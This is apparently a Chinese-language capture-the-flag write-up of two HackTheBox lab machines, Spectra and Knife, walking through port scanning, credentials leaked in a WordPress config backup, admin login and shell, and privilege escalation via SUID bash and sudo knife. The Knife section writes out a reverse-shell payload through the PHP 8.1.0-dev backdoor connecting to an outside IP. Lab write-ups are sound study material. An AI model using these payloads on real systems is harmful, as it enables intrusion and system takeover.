hackthebox spectra&knife靶机
前言
换电脑之后kali使用体验变好了,16G内存还是香啊。后面hackthebox会做的多一些。这两个机器就放一篇了。
spectra
web打点
nmap -sV -v ip扫端口
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
80/tcp open http nginx 1.17.4
3306/tcp open mysql MySQL (unauthorized)
8081/tcp open blackice-icecap?
80端口暴露信息:
http://spectra.htb/main/index.php
http://spectra.htb/testing/index.php
修改hosts文件 把spectra.htb 配上,重新访问。
继续探测这俩暴露目录,发现test存在目录遍历(这俩都是wordpress,应该一个是测试,一个是正式)
在这里 view-source:http://spectra.htb/testing/wp-config.php.save
发现数据库配置信息,如账号密码
define( 'DB_NAME', 'dev' );
/** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
尝试用这个账号密码去main目录下登录,发现报告用户名错误。
爆破一波账号名得到Administrator,成功登录。接下来就是之前UA: Literally靶机做过的管理员权限后台getshell了,之前手打过一次,这次直接msf吧。
⭐有一点要注意,TARGETURI的格式,前后都要有斜杠
提权
惯例先找suid提权
有个/bin/bash还行
/bin/bash -p
直接就到root了,顺便分享一个提权辅助网站,之前刚在先知看到的
https://gtfobins.github.io/
knife
常规操作下来啥也没发现,看了下别人的walkthrough才发现是PHP/8.1.0-dev后门。这个事情之前是又看过的,还是不够敏感啊。
反弹shell
zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.41/4444 0>&1'");
这里直接用单引号里那段还执行不了
反弹shell之后准备提权,执行sudo -l发现有个/usr/bin/knife命令无需密码。
执行一下,在说明中发现可以执行脚本
这里也有个弯弯绕,我一开始直接写了个shell脚本测试,执行报错。但在拿user.txt的时候发现目录下有一个abc.rb,还是空的。我就尝试写rb脚本命令了,结果成了。